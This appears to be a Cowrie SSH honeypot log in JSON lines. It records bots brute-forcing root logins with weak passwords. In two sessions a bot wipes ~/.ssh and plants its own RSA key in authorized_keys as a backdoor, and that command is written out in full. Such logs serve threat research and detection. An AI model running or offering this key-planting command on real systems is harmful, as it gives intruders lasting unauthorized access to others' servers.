{"eventid":"cowrie.login.failed","username":"default","password":"changeme","message":"login attempt [default/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T06:35:06.285885Z","src_ip":"157.20.207.165","session":"1b2dafb66e3a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:35:07.472223Z","src_ip":"157.20.207.165","session":"1b2dafb66e3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65483,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcc8db379f91","protocol":"ssh","message":"New connection: 212.227.235.229:65483 (1.2.3.4:22) [session: bcc8db379f91]","sensor":"my-vps","timestamp":"2025-09-09T06:35:15.041916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:35:15.043336Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:35:15.155634Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123QWE123","message":"login attempt [root/qwe123QWE123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:35:15.639834Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:35:15.905723Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:35:15.906422Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:35:15.907212Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:35:16.024501Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:35:16.307419Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:35:16.308096Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:35:16.423170Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:35:16.424021Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56489,"dst_ip":"1.2.3.4","dst_port":22,"session":"014f8e12c000","protocol":"ssh","message":"New connection: 212.227.235.229:56489 (1.2.3.4:22) [session: 014f8e12c000]","sensor":"my-vps","timestamp":"2025-09-09T06:35:16.536428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:35:16.537083Z","src_ip":"212.227.235.229","session":"014f8e12c000"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:35:16.647489Z","src_ip":"212.227.235.229","session":"014f8e12c000"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:35:17.143690Z","src_ip":"212.227.235.229","session":"014f8e12c000"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:35:18.258996Z","src_ip":"212.227.235.229","session":"014f8e12c000"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60035,"dst_ip":"1.2.3.4","dst_port":22,"session":"2737d619a969","protocol":"ssh","message":"New connection: 212.227.235.229:60035 (1.2.3.4:22) [session: 2737d619a969]","sensor":"my-vps","timestamp":"2025-09-09T06:35:18.367292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:35:18.367919Z","src_ip":"212.227.235.229","session":"2737d619a969"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:35:18.476665Z","src_ip":"212.227.235.229","session":"2737d619a969"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:35:18.950819Z","src_ip":"212.227.235.229","session":"2737d619a969"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:35:19.060999Z","src_ip":"212.227.235.229","session":"2737d619a969"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:35:19.061869Z","src_ip":"212.227.235.229","session":"bcc8db379f91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43163,"dst_ip":"1.2.3.4","dst_port":22,"session":"6638f21ad425","protocol":"ssh","message":"New connection: 212.227.235.229:43163 (1.2.3.4:22) [session: 6638f21ad425]","sensor":"my-vps","timestamp":"2025-09-09T06:35:54.187963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:35:54.189044Z","src_ip":"212.227.235.229","session":"6638f21ad425"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:35:54.256997Z","src_ip":"212.227.235.229","session":"6638f21ad425"}
{"eventid":"cowrie.login.failed","username":"ctf","password":"ctf1234","message":"login attempt [ctf/ctf1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:35:54.568101Z","src_ip":"212.227.235.229","session":"6638f21ad425"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:35:55.637359Z","src_ip":"212.227.235.229","session":"6638f21ad425"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34989,"dst_ip":"1.2.3.4","dst_port":22,"session":"e96d1254eb8c","protocol":"ssh","message":"New connection: 212.227.235.229:34989 (1.2.3.4:22) [session: e96d1254eb8c]","sensor":"my-vps","timestamp":"2025-09-09T06:35:59.176491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:35:59.177224Z","src_ip":"212.227.235.229","session":"e96d1254eb8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:35:59.419356Z","src_ip":"212.227.235.229","session":"e96d1254eb8c"}
{"eventid":"cowrie.login.failed","username":"william","password":"123456","message":"login attempt [william/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T06:36:00.430772Z","src_ip":"212.227.235.229","session":"e96d1254eb8c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:01.682021Z","src_ip":"212.227.235.229","session":"e96d1254eb8c"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":51000,"dst_ip":"1.2.3.4","dst_port":22,"session":"c283b8e63db9","protocol":"ssh","message":"New connection: 118.26.39.178:51000 (1.2.3.4:22) [session: c283b8e63db9]","sensor":"my-vps","timestamp":"2025-09-09T06:36:02.314824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:36:02.315934Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:36:02.576872Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.login.success","username":"root","password":"rockstar","message":"login attempt [root/rockstar] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:36:03.665421Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:36:04.207222Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:36:04.207957Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:36:04.209083Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:04.471706Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:36:05.109184Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:36:05.110137Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:36:05.375821Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:05.376908Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":51004,"dst_ip":"1.2.3.4","dst_port":22,"session":"0044db6377d0","protocol":"ssh","message":"New connection: 118.26.39.178:51004 (1.2.3.4:22) [session: 0044db6377d0]","sensor":"my-vps","timestamp":"2025-09-09T06:36:05.518772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:36:05.521354Z","src_ip":"118.26.39.178","session":"0044db6377d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:36:06.537404Z","src_ip":"118.26.39.178","session":"0044db6377d0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:36:07.191502Z","src_ip":"118.26.39.178","session":"0044db6377d0"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:08.394847Z","src_ip":"118.26.39.178","session":"0044db6377d0"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":60368,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2f0ef8fca7b","protocol":"ssh","message":"New connection: 118.26.39.178:60368 (1.2.3.4:22) [session: a2f0ef8fca7b]","sensor":"my-vps","timestamp":"2025-09-09T06:36:08.710738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:36:08.711855Z","src_ip":"118.26.39.178","session":"a2f0ef8fca7b"}
